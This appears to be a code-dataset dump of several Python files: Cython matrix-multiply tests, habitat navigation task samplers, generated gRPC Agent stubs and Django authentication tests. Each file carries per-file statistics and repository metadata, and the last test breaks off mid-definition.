res2 = dmul_cython_omp(va, vb)
assert_almost_equal(res1, res2)
def test_matrix_mul_fail(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
with self.assertRaises(RuntimeError):
dmul_cython_omp(va, vb, algo=4)
def test_matrix_mul_algo(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
res1 = va @ vb
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_para(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(4, 5).astype(numpy.float64)
res1 = va @ vb
for algo in range(0, 2):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo, parallel=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_t(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(5, 4).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_t_big(self):
va = numpy.random.randn(300, 400).astype(numpy.float64)
vb = numpy.random.randn(500, 400).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_t_big_odd(self):
va = numpy.random.randn(30, 41).astype(numpy.float64)
vb = numpy.random.randn(50, 41).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 3):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_para_t(self):
va = numpy.random.randn(3, 4).astype(numpy.float64)
vb = numpy.random.randn(5, 4).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 2):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo, parallel=1,
b_trans=1)
assert_almost_equal(res1, res2)
def test_matrix_mul_algo_para_t_big(self):
va = numpy.random.randn(300, 400).astype(numpy.float64)
vb = numpy.random.randn(500, 400).astype(numpy.float64)
res1 = va @ vb.T
for algo in range(0, 2):
with self.subTest(algo=algo):
res2 = dmul_cython_omp(va, vb, algo=algo, parallel=1,
b_trans=1)
assert_almost_equal(res1, res2)
if __name__ == '__main__':
    # Allow running this test module directly: `python test_tutorial_mul.py`.
    unittest.main()
| 38.104167
| 69
| 0.579005
| 503
| 3,658
| 4.025845
| 0.127237
| 0.097778
| 0.142222
| 0.071111
| 0.870617
| 0.849877
| 0.829136
| 0.811358
| 0.811358
| 0.791111
| 0
| 0.058498
| 0.308365
| 3,658
| 95
| 70
| 38.505263
| 0.741897
| 0.009568
| 0
| 0.708861
| 0
| 0
| 0.002213
| 0
| 0
| 0
| 0
| 0
| 0.126582
| 1
| 0.113924
| false
| 0
| 0.050633
| 0
| 0.177215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7189516ae12da8584b01f60f6b34565cbfed8c79
| 7,071
|
py
|
Python
|
plugins/habitat_plugin/habitat_task_samplers.py
|
mattdeitke/allenact-1
|
70f106b32a38424e862399a76d84f607838063be
|
[
"MIT"
] | null | null | null |
plugins/habitat_plugin/habitat_task_samplers.py
|
mattdeitke/allenact-1
|
70f106b32a38424e862399a76d84f607838063be
|
[
"MIT"
] | null | null | null |
plugins/habitat_plugin/habitat_task_samplers.py
|
mattdeitke/allenact-1
|
70f106b32a38424e862399a76d84f607838063be
|
[
"MIT"
] | null | null | null |
from typing import List, Optional, Union, Callable
import gym
import habitat
from habitat.config import Config
from core.base_abstractions.sensor import Sensor
from core.base_abstractions.task import TaskSampler
from plugins.habitat_plugin.habitat_environment import HabitatEnvironment
from plugins.habitat_plugin.habitat_tasks import PointNavTask, ObjectNavTask # type: ignore
class PointNavTaskSampler(TaskSampler):
    """Samples `PointNavTask`s from a habitat dataset.

    The `HabitatEnvironment` is created lazily on the first call to
    `next_task`. In non-"train" mode the sampler is bounded by the number
    of episodes in the (optionally filtered) dataset; in "train" mode it
    samples indefinitely.
    """

    def __init__(
        self,
        env_config: Config,
        sensors: List[Sensor],
        max_steps: int,
        action_space: gym.Space,
        distance_to_goal: float,
        filter_dataset_func: Optional[
            Callable[[habitat.Dataset], habitat.Dataset]
        ] = None,
        **task_init_kwargs,
    ) -> None:
        self.grid_size = 0.25
        # Created lazily in `next_task` via `_create_environment`.
        self.env: Optional[HabitatEnvironment] = None
        self.max_tasks: Optional[int] = None
        self.reset_tasks: Optional[int] = None
        self.sensors = sensors
        self.max_steps = max_steps
        self._action_space = action_space
        self.env_config = env_config
        self.distance_to_goal = distance_to_goal
        self.seed: Optional[int] = None
        self.filter_dataset_func = filter_dataset_func
        self._last_sampled_task: Optional[PointNavTask] = None
        # Extra kwargs forwarded verbatim to every `PointNavTask`.
        self.task_init_kwargs = task_init_kwargs

    def _create_environment(self) -> HabitatEnvironment:
        """Build the habitat environment and initialize task-count bookkeeping.

        Raises:
            RuntimeError: if the dataset is empty, before or after filtering.
        """
        dataset = habitat.make_dataset(
            self.env_config.DATASET.TYPE, config=self.env_config.DATASET
        )
        if len(dataset.episodes) == 0:
            raise RuntimeError("Empty input dataset.")
        if self.filter_dataset_func is not None:
            dataset = self.filter_dataset_func(dataset)
            if len(dataset.episodes) == 0:
                raise RuntimeError("Empty dataset after filtering.")
        env = HabitatEnvironment(config=self.env_config, dataset=dataset)
        # Unbounded sampling while training; otherwise one task per episode.
        self.max_tasks = (
            None if self.env_config.MODE == "train" else env.num_episodes
        )
        self.reset_tasks = self.max_tasks
        return env

    @property
    def length(self) -> Union[int, float]:
        """
        @return: Number of total tasks remaining that can be sampled. Can be float('inf').
        """
        return float("inf") if self.max_tasks is None else self.max_tasks

    @property
    def total_unique(self) -> Union[int, float, None]:
        # None until the environment has been created by `next_task`;
        # previously this raised AttributeError on a fresh sampler.
        return None if self.env is None else self.env.num_episodes

    @property
    def last_sampled_task(self) -> Optional[PointNavTask]:
        return self._last_sampled_task

    def close(self) -> None:
        if self.env is not None:
            self.env.stop()

    @property
    def all_observation_spaces_equal(self) -> bool:
        """
        @return: True if all Tasks that can be sampled by this sampler have the
        same observation space. Otherwise False.
        """
        return True

    def next_task(self, force_advance_scene=False) -> Optional[PointNavTask]:
        """Advance to the next episode and wrap it in a `PointNavTask`.

        @return: the new task, or None once `max_tasks` is exhausted.
        """
        if self.max_tasks is not None and self.max_tasks <= 0:
            return None
        if self.env is not None:
            self.env.reset()
        else:
            self.env = self._create_environment()
            self.env.reset()
        ep_info = self.env.get_current_episode()
        target = ep_info.goals[0].position
        task_info = {
            "target": target,
            "distance_to_goal": self.distance_to_goal,
        }
        self._last_sampled_task = PointNavTask(
            env=self.env,
            sensors=self.sensors,
            task_info=task_info,
            max_steps=self.max_steps,
            action_space=self._action_space,
            **self.task_init_kwargs,
        )
        if self.max_tasks is not None:
            self.max_tasks -= 1
        return self._last_sampled_task

    def reset(self):
        self.max_tasks = self.reset_tasks

    def set_seed(self, seed: int):
        self.seed = seed
        # Only forward the seed when the environment already exists;
        # previously this raised AttributeError whenever `set_seed` was
        # called before the first `next_task` created `self.env`.
        if seed is not None and self.env is not None:
            self.env.env.seed(seed)
class ObjectNavTaskSampler(TaskSampler):
    """Samples `ObjectNavTask`s from a habitat dataset.

    Mirrors `PointNavTaskSampler`: the `HabitatEnvironment` is created
    lazily on the first `next_task`, and sampling is unbounded in "train"
    mode or bounded by the dataset's episode count otherwise.
    """

    def __init__(
        self,
        env_config: Config,
        sensors: List[Sensor],
        max_steps: int,
        action_space: gym.Space,
        distance_to_goal: float,
        **kwargs,
    ) -> None:
        self.grid_size = 0.25
        # Created lazily in `next_task` via `_create_environment`.
        self.env: Optional[HabitatEnvironment] = None
        self.max_tasks: Optional[int] = None
        self.reset_tasks: Optional[int] = None
        self.sensors = sensors
        self.max_steps = max_steps
        self._action_space = action_space
        self.env_config = env_config
        self.distance_to_goal = distance_to_goal
        self.seed: Optional[int] = None
        self._last_sampled_task: Optional[ObjectNavTask] = None

    def _create_environment(self) -> HabitatEnvironment:
        """Build the habitat environment and initialize task-count bookkeeping.

        Raises:
            RuntimeError: if the dataset contains no episodes.
        """
        dataset = habitat.make_dataset(
            self.env_config.DATASET.TYPE, config=self.env_config.DATASET
        )
        # Fail fast on an empty dataset, consistent with PointNavTaskSampler.
        if len(dataset.episodes) == 0:
            raise RuntimeError("Empty input dataset.")
        env = HabitatEnvironment(config=self.env_config, dataset=dataset)
        self.max_tasks = (
            None if self.env_config.MODE == "train" else env.num_episodes
        )  # mp3d objectnav val -> 2184
        self.reset_tasks = self.max_tasks
        return env

    @property
    def length(self) -> Union[int, float]:
        """
        @return: Number of total tasks remaining that can be sampled. Can be float('inf').
        """
        return float("inf") if self.max_tasks is None else self.max_tasks

    @property
    def total_unique(self) -> Union[int, float, None]:
        # None until the environment has been created by `next_task`;
        # previously this raised AttributeError on a fresh sampler.
        return None if self.env is None else self.env.num_episodes

    @property
    def last_sampled_task(self) -> Optional[ObjectNavTask]:
        return self._last_sampled_task

    def close(self) -> None:
        if self.env is not None:
            self.env.stop()

    @property
    def all_observation_spaces_equal(self) -> bool:
        """
        @return: True if all Tasks that can be sampled by this sampler have the
        same observation space. Otherwise False.
        """
        return True

    def next_task(self, force_advance_scene=False) -> Optional[ObjectNavTask]:
        """Advance to the next episode and wrap it in an `ObjectNavTask`.

        @return: the new task, or None once `max_tasks` is exhausted.
        """
        if self.max_tasks is not None and self.max_tasks <= 0:
            return None
        if self.env is not None:
            self.env.reset()
        else:
            self.env = self._create_environment()
            self.env.reset()
        ep_info = self.env.get_current_episode()
        target = ep_info.goals[0].position
        task_info = {
            "target": target,
            "distance_to_goal": self.distance_to_goal,
        }
        self._last_sampled_task = ObjectNavTask(
            env=self.env,
            sensors=self.sensors,
            task_info=task_info,
            max_steps=self.max_steps,
            action_space=self._action_space,
        )
        if self.max_tasks is not None:
            self.max_tasks -= 1
        return self._last_sampled_task

    def reset(self):
        self.max_tasks = self.reset_tasks

    def set_seed(self, seed: int):
        self.seed = seed
        # Only forward the seed when the environment already exists;
        # previously this raised AttributeError whenever `set_seed` was
        # called before the first `next_task` created `self.env`.
        if seed is not None and self.env is not None:
            self.env.env.seed(seed)
| 31.287611
| 92
| 0.620421
| 863
| 7,071
| 4.862109
| 0.137891
| 0.056721
| 0.057197
| 0.036225
| 0.832936
| 0.806244
| 0.806244
| 0.806244
| 0.806244
| 0.78408
| 0
| 0.003801
| 0.293028
| 7,071
| 225
| 93
| 31.426667
| 0.835567
| 0.06463
| 0
| 0.77907
| 0
| 0
| 0.016915
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116279
| false
| 0
| 0.046512
| 0.023256
| 0.255814
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71ae39d611bc7834df990ccc83d4264e08958cf7
| 12,631
|
py
|
Python
|
server/grpc/example_pb2_grpc.py
|
amine-ouertani/DigitalBeing
|
1acba704d4dd512b54b3cce124ecad3926268695
|
[
"MIT"
] | null | null | null |
server/grpc/example_pb2_grpc.py
|
amine-ouertani/DigitalBeing
|
1acba704d4dd512b54b3cce124ecad3926268695
|
[
"MIT"
] | null | null | null |
server/grpc/example_pb2_grpc.py
|
amine-ouertani/DigitalBeing
|
1acba704d4dd512b54b3cce124ecad3926268695
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import example_pb2 as example__pb2
class AgentStub(object):
    """Client-side stub for the ``Agent`` gRPC service.

    Each attribute is a unary-unary callable that serializes an
    ``example_pb2.Request`` and deserializes an ``example_pb2.Response``.
    (Generated code — do not hand-edit beyond comments.)
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.InitializeAgents = channel.unary_unary(
                '/Agent/InitializeAgents',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
        self.HandleMessage = channel.unary_unary(
                '/Agent/HandleMessage',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
        self.InvokeSoloAgent = channel.unary_unary(
                '/Agent/InvokeSoloAgent',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
        self.GetAgents = channel.unary_unary(
                '/Agent/GetAgents',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
        self.SetAgentFields = channel.unary_unary(
                '/Agent/SetAgentFields',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
        self.HandleSlashCommand = channel.unary_unary(
                '/Agent/HandleSlashCommand',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
        self.HandleUserUpdate = channel.unary_unary(
                '/Agent/HandleUserUpdate',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
        self.HandleMessageReaction = channel.unary_unary(
                '/Agent/HandleMessageReaction',
                request_serializer=example__pb2.Request.SerializeToString,
                response_deserializer=example__pb2.Response.FromString,
                )
class AgentServicer(object):
    """Server-side interface for the ``Agent`` service.

    Subclass and override the handlers below; every method aborts the RPC
    with ``UNIMPLEMENTED`` until overridden. (Generated code.)
    """

    def InitializeAgents(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def HandleMessage(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def InvokeSoloAgent(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def GetAgents(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def SetAgentFields(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def HandleSlashCommand(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def HandleUserUpdate(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def HandleMessageReaction(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_AgentServicer_to_server(servicer, server):
    """Register *servicer*'s handlers for the ``Agent`` service on *server*.

    Each entry maps an RPC name to a unary-unary handler that deserializes
    ``example_pb2.Request`` and serializes ``example_pb2.Response``.
    (Generated code.)
    """
    rpc_method_handlers = {
            'InitializeAgents': grpc.unary_unary_rpc_method_handler(
                    servicer.InitializeAgents,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
            'HandleMessage': grpc.unary_unary_rpc_method_handler(
                    servicer.HandleMessage,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
            'InvokeSoloAgent': grpc.unary_unary_rpc_method_handler(
                    servicer.InvokeSoloAgent,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
            'GetAgents': grpc.unary_unary_rpc_method_handler(
                    servicer.GetAgents,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
            'SetAgentFields': grpc.unary_unary_rpc_method_handler(
                    servicer.SetAgentFields,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
            'HandleSlashCommand': grpc.unary_unary_rpc_method_handler(
                    servicer.HandleSlashCommand,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
            'HandleUserUpdate': grpc.unary_unary_rpc_method_handler(
                    servicer.HandleUserUpdate,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
            'HandleMessageReaction': grpc.unary_unary_rpc_method_handler(
                    servicer.HandleMessageReaction,
                    request_deserializer=example__pb2.Request.FromString,
                    response_serializer=example__pb2.Response.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'Agent', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
 # This class is part of an EXPERIMENTAL API.
class Agent(object):
    """Static convenience wrappers (experimental gRPC API) that invoke each
    ``Agent`` RPC without constructing a stub. (Generated code.)"""

    @staticmethod
    def InitializeAgents(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/InitializeAgents',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def HandleMessage(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessage',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def InvokeSoloAgent(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/InvokeSoloAgent',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetAgents(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/GetAgents',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def SetAgentFields(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/SetAgentFields',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def HandleSlashCommand(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/HandleSlashCommand',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def HandleUserUpdate(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/HandleUserUpdate',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def HandleMessageReaction(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessageReaction',
            example__pb2.Request.SerializeToString,
            example__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 42.385906
| 93
| 0.640804
| 1,080
| 12,631
| 7.237037
| 0.088889
| 0.063971
| 0.052201
| 0.069601
| 0.809237
| 0.809237
| 0.809237
| 0.770343
| 0.763434
| 0.748849
| 0
| 0.005517
| 0.28248
| 12,631
| 297
| 94
| 42.52862
| 0.856891
| 0.067849
| 0
| 0.698413
| 1
| 0
| 0.072847
| 0.026109
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.007937
| 0.031746
| 0.123016
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71e2987dd8aec6a260512b9e75fb3ee33fd4b592
| 20,953
|
py
|
Python
|
user/tests/test_authentication.py
|
dev-jochland/Employee-Management-System
|
e4a1e87b7bd9b72a2fa6eaf11293eaad50803ad8
|
[
"MIT"
] | null | null | null |
user/tests/test_authentication.py
|
dev-jochland/Employee-Management-System
|
e4a1e87b7bd9b72a2fa6eaf11293eaad50803ad8
|
[
"MIT"
] | null | null | null |
user/tests/test_authentication.py
|
dev-jochland/Employee-Management-System
|
e4a1e87b7bd9b72a2fa6eaf11293eaad50803ad8
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
import user.models as um
class OrganisationSignUpTest(TestCase):
    """Exercise the organisation registration endpoint (``rest_register``)."""

    def setUp(self) -> None:
        self.client = APIClient()

    def _register(self, data):
        # Single POST to the registration endpoint; response returned for asserts.
        return self.client.post(reverse('rest_register'), data=data, format='json')

    def _assert_rejected(self, data, expected_detail):
        # Registration must fail with HTTP 400 and the given 'detail' message.
        response = self._register(data)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), expected_detail)

    def test_organisation_can_sign_up(self):
        """Validate every rejection path, a successful onboarding and its
        side effects, then duplicate-name/e-mail rejections."""
        good_data = {
            "full_name": "Company One",
            "company_name": "Company group",
            "email": "company1@user.com",
            "role": "CEO",
            "password1": "testpassword",
            "password2": "testpassword",
        }

        def variant(remove=(), **overrides):
            # Copy of the valid payload with fields dropped and/or replaced;
            # replaces the nine hand-written near-identical dicts.
            data = {k: v for k, v in good_data.items() if k not in remove}
            data.update(overrides)
            return data

        # Missing or malformed fields are each rejected with a specific message.
        self._assert_rejected(variant(remove=("full_name",)),
                              'Field full_name is required')
        self._assert_rejected(variant(full_name="Company"),
                              'Please provide your first name and last name')
        self._assert_rejected(variant(remove=("role",)),
                              'Field role is required')
        self._assert_rejected(variant(remove=("company_name",)),
                              'Field company_name is required')
        self._assert_rejected(variant(remove=("email",)),
                              'Field email is required')
        self._assert_rejected(variant(remove=("password1",)),
                              'Field password1 is required')
        self._assert_rejected(variant(remove=("password2",)),
                              'Field password2 is required')
        self._assert_rejected(variant(email="company1user.com"),
                              'Enter a valid email address.')
        self._assert_rejected(variant(password2="testpassword1"),
                              'The two password fields didn\'t match.')

        # A valid payload onboards the organisation.
        response = self._register(good_data)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data.get('detail'), 'Employer successfully onboarded with initial amount of nine '
                                                      'hundred and ninety nine trillion (999999999999999). '
                                                      'Please login to continue')
        # check wallet was created for organisation
        self.assertIsNotNone(um.Organisation.objects.get(name="Company group").wallet)
        # check admin object is created for email just onboarded
        self.assertIsNotNone(um.Admin.objects.get(user__email='company1@user.com'))
        # check super admin object is created for this email
        self.assertIsNotNone(um.OrganisationAdmin.objects.get(organisation__name="Company group",
                                                              admin__user__email='company1@user.com',
                                                              admin_type='super_admin'))

        # Duplicate company name (fresh e-mail) and duplicate e-mail
        # (fresh company name) are both rejected.
        self._assert_rejected(variant(email="company11@user.com"),
                              'Company name already exists')
        self._assert_rejected(variant(company_name="Company groups"),
                              'A user is already registered with this e-mail address.')
class LoginTest(TestCase):
    """Exercise the login endpoints for organisations, admins and employees."""

    def setUp(self) -> None:
        self.client = APIClient()

    def test_organisation_can_log_in(self):
        """End-to-end flow: onboard an organisation, check login rejections,
        log in, add an admin and an employee, then log each of them in.

        Order matters throughout: the admin/employee logins depend on the
        records created earlier in this same test method.
        """
        good_data = {
            "email": "company1@user.com",
            "password": "testpassword",
        }
        data_without_email = {
            "password": "testpassword",
        }
        data_without_password = {
            "email": "company1@user.com",
        }
        # Not registered as an admin anywhere — used to hit the non-admin branch.
        non_admin_email = {
            "email": "user1@user.com",
            "password": "testpassword",
        }
        data_with_wrong_auth_details = {
            "email": "company1@user.com",
            "password": "testpassword234",
        }
        sign_up_data = {
            "full_name": "Company One",
            "company_name": "Company group",
            "email": "company1@user.com",
            "role": "CEO",
            "password1": "testpassword",
            "password2": "testpassword"
        }
        # Organisation onboards
        response = self.client.post(reverse('rest_register'), data=sign_up_data, format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data.get('detail'), 'Employer successfully onboarded with initial amount of nine '
                                                      'hundred and ninety nine trillion (999999999999999). '
                                                      'Please login to continue')
        # Organisation tried authenticating without email
        response = self.client.post(reverse('rest_login'), data=data_without_email, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'Field email is required')
        # Organisation tried authenticating without password
        response = self.client.post(reverse('rest_login'), data=data_without_password, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'Field password is required')
        # Non admin email tries signing up
        response = self.client.post(reverse('rest_login'), data=non_admin_email, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'You are not an admin')
        # Organisation tried authenticating with wrong auth details
        response = self.client.post(reverse('rest_login'), data=data_with_wrong_auth_details, format='json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data.get('detail'), 'Unable to log in with provided credentials.')
        # Organisation tried authenticating with good data
        login_response = self.client.post(reverse('rest_login'), data=good_data, format='json')
        self.assertEqual(login_response.status_code, status.HTTP_200_OK)
        # Check access token is returned
        self.assertIsNotNone(login_response.data.get('access_token'))
        # Check refresh token is returned
        self.assertIsNotNone(login_response.data.get('refresh_token'))
        employee_data = {
            "full_name": "Employee Five",
            "email": "employee5@user.com"
        }
        admin_data = {
            "full_name": "Admin One",
            "email": "admin1@user.com"
        }
        login_admin_data = {
            "email": "admin1@user.com",
            "password": "testpassword"
        }
        login_employee_data = {
            "email": "employee5@user.com",
            "password": "testpassword"
        }
        # organisation add employee
        self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(login_response.data.get('access_token')))
        response = self.client.post(reverse('organisation-add-employee'), data=employee_data,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # organisation add admin
        self.client.credentials(HTTP_AUTHORIZATION='Bearer {}'.format(login_response.data.get('access_token')))
        response = self.client.post(reverse('organisation-add-admin'), data=admin_data,
                                    format='json')
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # Drop the bearer token so the following logins are unauthenticated.
        self.client.credentials()
        # Admin logs in
        admin_login_response = self.client.post(reverse('rest_login'), data=login_admin_data, format='json')
        self.assertEqual(admin_login_response.status_code, status.HTTP_200_OK)
        # Check access token is returned
        self.assertIsNotNone(admin_login_response.data.get('access_token'))
        # Check refresh token is returned
        self.assertIsNotNone(admin_login_response.data.get('refresh_token'))
        # employee logs in
        employee_login_response = self.client.post(reverse('rest_login2'), data=login_employee_data, format='json')
        self.assertEqual(employee_login_response.status_code, status.HTTP_200_OK)
        # Check access token is returned
        self.assertIsNotNone(employee_login_response.data.get('access_token'))
        # Check refresh token is returned
        self.assertIsNotNone(employee_login_response.data.get('refresh_token'))
class ChangePasswordTest(TestCase):
    """End-to-end tests for the authenticated password-change endpoint.

    Exercises the full flow visible below: organisation sign-up and login,
    every validation failure of ``rest_password_change`` (missing
    old/new fields, wrong old password, mismatched new passwords), a
    successful change, and then successful changes by an admin and an
    employee the organisation creates.
    """

    def setUp(self) -> None:
        # Fresh DRF test client per test; auth credentials are attached
        # per-request via self.client.credentials(...).
        self.client = APIClient()

    def test_change_password(self):
        # Payload used to onboard the organisation account.
        sign_up_data = {
            "full_name": "Company One",
